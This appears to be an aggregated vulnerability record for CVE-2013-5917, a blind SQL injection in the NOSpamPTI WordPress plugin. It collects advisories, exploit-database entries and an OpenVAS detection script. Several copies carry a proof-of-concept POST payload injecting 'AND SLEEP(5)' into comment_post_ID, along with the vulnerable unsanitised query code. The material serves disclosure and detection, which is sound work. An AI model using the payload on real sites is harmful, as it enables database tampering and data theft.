SQL injection vulnerability in wp-comments-post.php in the NOSpam PTI plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the comment_post_ID parameter.
{"patchstack": [{"lastseen": "2022-06-01T19:50:43", "description": "NOSpamPTI plugin is prone to a blind SQL injection vulnerability because of the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. The issue allows to manipulate SQL queries in the back-end database. It results manipulation or disclosure of arbitrary data.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "patchstack", "title": "WordPress NOSpamPTI Plugin - Blind SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "PATCHSTACK:539F48BC895625966452BE14A09601C6", "href": "https://patchstack.com/database/vulnerability/nospampti/wordpress-nospampti-plugin-blind-sql-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-02T05:11:46", "description": "WordPress NOSpamPTI plugin version 2.1 suffers from a remote blind SQL injection vulnerability.", "cvss3": {}, "published": "2013-09-21T00:00:00", "type": "zdt", "title": "WordPress NOSpamPTI 2.1 Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-21T00:00:00", "id": "1337DAY-ID-21260", "href": "https://0day.today/exploit/description/21260", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&[email\u00a0protected]&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos\r\n\r\nalexos (at) ibliss.com (dot) br [email concealed]\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/21260", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-18T01:25:08", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "zdt", "title": "Wordpress NOSpamPTI Plugin - Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "1337DAY-ID-21269", "href": "https://0day.today/exploit/description/21269", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n \r\n[ Vendor product description ]\r\n \r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n \r\n[ Bug Description ]\r\n \r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n \r\n[ History ]\r\n \r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\r\n \r\n[ Impact ]\r\n \r\nHIGH\r\n \r\n[ Afected Version ]\r\n \r\n2.1\r\n \r\n[ CVE Reference]\r\n \r\nCVE-2013-5917\r\n \r\n[ POC ]\r\n \r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n \r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&[email\u00a0protected]&submit=Post Comment&url=1\r\n \r\n[ Vulnerable code ]\r\n \r\n$post_id = $_POST['comment_post_ID'];\r\n \r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n \r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n \r\n \r\n[ Reference ]\r\n \r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n \r\n--------------------------------------------\r\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos\n\n# 0day.today [2018-02-17] #", "sourceHref": "https://0day.today/exploit/21269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:38:20", "description": "This host is installed with WordPress NOSpamPTI plugin and is prone to sql\ninjection vulnerability.", "cvss3": {}, "published": "2013-09-27T00:00:00", "type": "openvas", "title": "WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2018-09-15T00:00:00", "id": "OPENVAS:1361412562310804021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804021", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_nospampti_blind_sql_inj_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804021\");\n script_version(\"$Revision: 11401 $\");\n script_cve_id(\"CVE-2013-5917\");\n script_bugtraq_id(62580);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-27 18:32:16 +0530 (Fri, 27 Sep 2013)\");\n script_name(\"WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with WordPress NOSpamPTI plugin and is prone to sql\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check whether it is able to execute sql\ncommand or not.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\nsince the disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\");\n script_tag(name:\"insight\", value:\"Input passed via the 'comment_post_ID' parameter to wp-comments-post.php\nscript is not properly sanitised before being used in the code.\");\n script_tag(name:\"affected\", value:\"WordPress NOSpamPTI Plugin version 2.1 and prior.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to inject or manipulate SQL\nqueries in the back-end database, allowing for the manipulation or\ndisclosure of arbitrary data.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Sep/101\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + \"/wp-comments-post.php\";\n\nsleep = make_list(1 , 3);\n\nhost = http_host_name(port:http_port);\n\nforeach i (sleep)\n{\n comment = rand_str(length:8);\n\n postData = \"author=OpenVAS&email=test%40mail.com&url=1&comment=\" + comment +\n \"&submit=Post+Comment&comment_post_ID=1 AND SLEEP(\" + i + \")&comment_parent=0\";\n\n asReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postData), \"\\r\\n\",\n \"\\r\\n\", postData);\n\n start = unixtime();\n asRes = http_keepalive_send_recv(port:http_port, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n else temp += 1;\n}\n\nif (temp == 2 )\n{\n security_message(port:http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "cvss3": {}, "published": "2013-09-20T00:00:00", "type": "packetstorm", "title": "WordPress NOSpamPTI 2.1 Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-20T00:00:00", "id": "PACKETSTORM:123331", "href": "https://packetstormsecurity.com/files/123331/WordPress-NOSpamPTI-2.1-Blind-SQL-Injection.html", "sourceData": "`[ NOSpamPTI Wordpress plugin Blind SQL Injection ] \n \n[ Vendor product description ] \n \nNOSpamPTI eliminates the spam in your comment box so strong and free, \ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\" \nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support \nchanges to the functions.php to this we alter this function and \navailable as a plugin. Make good use of this plugin and forget all the Spam. \n \n[ Bug Description ] \n \nNOSpamPTI contains a flaw that may allow an attacker to carry out a \nBlind SQL injection attack. The issue is due to the wp-comments-post.php \nscript not properly sanitizing the comment_post_ID in POST data. This \nmay allow an attacker to inject or manipulate SQL queries in the \nback-end database, allowing for the manipulation or disclosure of \narbitrary data. \n \n[ History ] \n \nAdvisory sent to vendor on 09/09/2013 \nVendor reply 09/20/2013. According the vendor, the plugin was deprecated. \n \n[ Impact ] \n \nHIGH \n \n[ Afected Version ] \n \n2.1 \n \n[ CVE Reference] \n \nCVE-2013-5917 \n \n[ POC ] \n \nPayload: \nPOST /wordpress/wp-comments-post.php \n \nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1 \nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1 \n \n[ Vulnerable code ] \n \n$post_id = $_POST['comment_post_ID']; \n \nload_plugin_textdomain('nospampti', \nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/'); \n \nif ($hash != $challenge) { \n$wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID = \n{$comment_id}\"); \n$count = $wpdb->get_var(\"select count(*) from $wpdb->comments \nwhere comment_post_id = {$post_id} and comment_approved = '1'\"); \n \n \n[ Reference ] \n \n[1] No SpamPTI SVN repository - \nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php \n[2] Owasp - https://owasp.org/index.php/SQL_Injection \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ \n \n-------------------------------------------- \niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos \n \nalexos (at) ibliss.com (dot) br [email concealed] \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123331/wpnospampti-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:18:41", "bulletinFamily": "software", "cvelist": ["CVE-2013-5917"], "description": "The nospampti WordPress plugin was affected by a wp-comments-post.php comment_post_ID Parameter SQL Injection security vulnerability.\n", "modified": "2019-10-21T10:32:40", "published": "2014-08-01T10:59:03", "id": "WPVDB-ID:36A3A0FA-B911-4F00-AA93-C5C1B16D0887", "href": "https://wpscan.com/vulnerability/36a3a0fa-b911-4f00-aa93-c5c1b16d0887", "type": "wpvulndb", "title": "NOSpamPTI 2.1 - wp-comments-post.php comment_post_ID Parameter SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-5917"], "description": "\r\n\r\n[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href="http://bit.ly/d38gB8"\r\nrel="nofollow">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}");\r\n $count = $wpdb->get_var("select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss Seguranca e Inteligencia - Sponsor: Alexandro Silva - Alexos\r\n\r\nalexos (at) ibliss.com (dot) br [email concealed]\r\n\r\n", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:DOC:29866", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29866", "title": "[iBliss Security Advisory] Blind SQL injection vulnerability in NOSpamPTI wordpress plugin", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:20", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2013-10-02T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-5640", "CVE-2013-5916", "CVE-2013-4339", "CVE-2013-5639", "CVE-2013-5692", "CVE-2013-1443", "CVE-2013-4340", "CVE-2013-5696", "CVE-2013-2225", "CVE-2013-5917", "CVE-2013-4315", "CVE-2013-5739", "CVE-2013-2226", "CVE-2013-5738", "CVE-2013-4338", "CVE-2013-5693"], "modified": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:08", "description": "\nWordPress Plugin NOSpamPTI - Blind SQL Injection", "edition": 2, "cvss3": {}, "published": "2013-09-23T00:00:00", "title": "WordPress Plugin NOSpamPTI - Blind SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "EXPLOITPACK:54A43696C6486D0F58617FC5378E5A1A", "href": "", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\n\n[ Vendor product description ]\n\nNOSpamPTI eliminates the spam in your comment box so strong and free,\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\nchanges to the functions.php to this we alter this function and\navailable as a plugin. Make good use of this plugin and forget all the Spam.\n\n[ Bug Description ]\n\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\nscript not properly sanitizing the comment_post_ID in POST data. This\nmay allow an attacker to inject or manipulate SQL queries in the\nback-end database, allowing for the manipulation or disclosure of\narbitrary data.\n\n[ History ]\n\nAdvisory sent to vendor on 09/09/2013\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\n\n[ Impact ]\n\nHIGH\n\n[ Afected Version ]\n\n2.1\n\n[ CVE Reference]\n\nCVE-2013-5917\n\n[ POC ]\n\nPayload:\nPOST /wordpress/wp-comments-post.php\n\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\n\n[ Vulnerable code ]\n\n$post_id = $_POST['comment_post_ID'];\n\nload_plugin_textdomain('nospampti',\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\n\n if ($hash != $challenge) {\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\n{$comment_id}\");\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\n\n\n[ Reference ]\n\n[1] No SpamPTI SVN repository -\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\n\n--------------------------------------------\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-01-13T06:16:22", "description": "", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "exploitdb", "title": "WordPress Plugin NOSpamPTI - Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917", "2013-5917"], "modified": "2013-09-23T00:00:00", "id": "EDB-ID:28485", "href": "https://www.exploit-db.com/exploits/28485", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos", "sourceHref": "https://www.exploit-db.com/download/28485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2013-5917
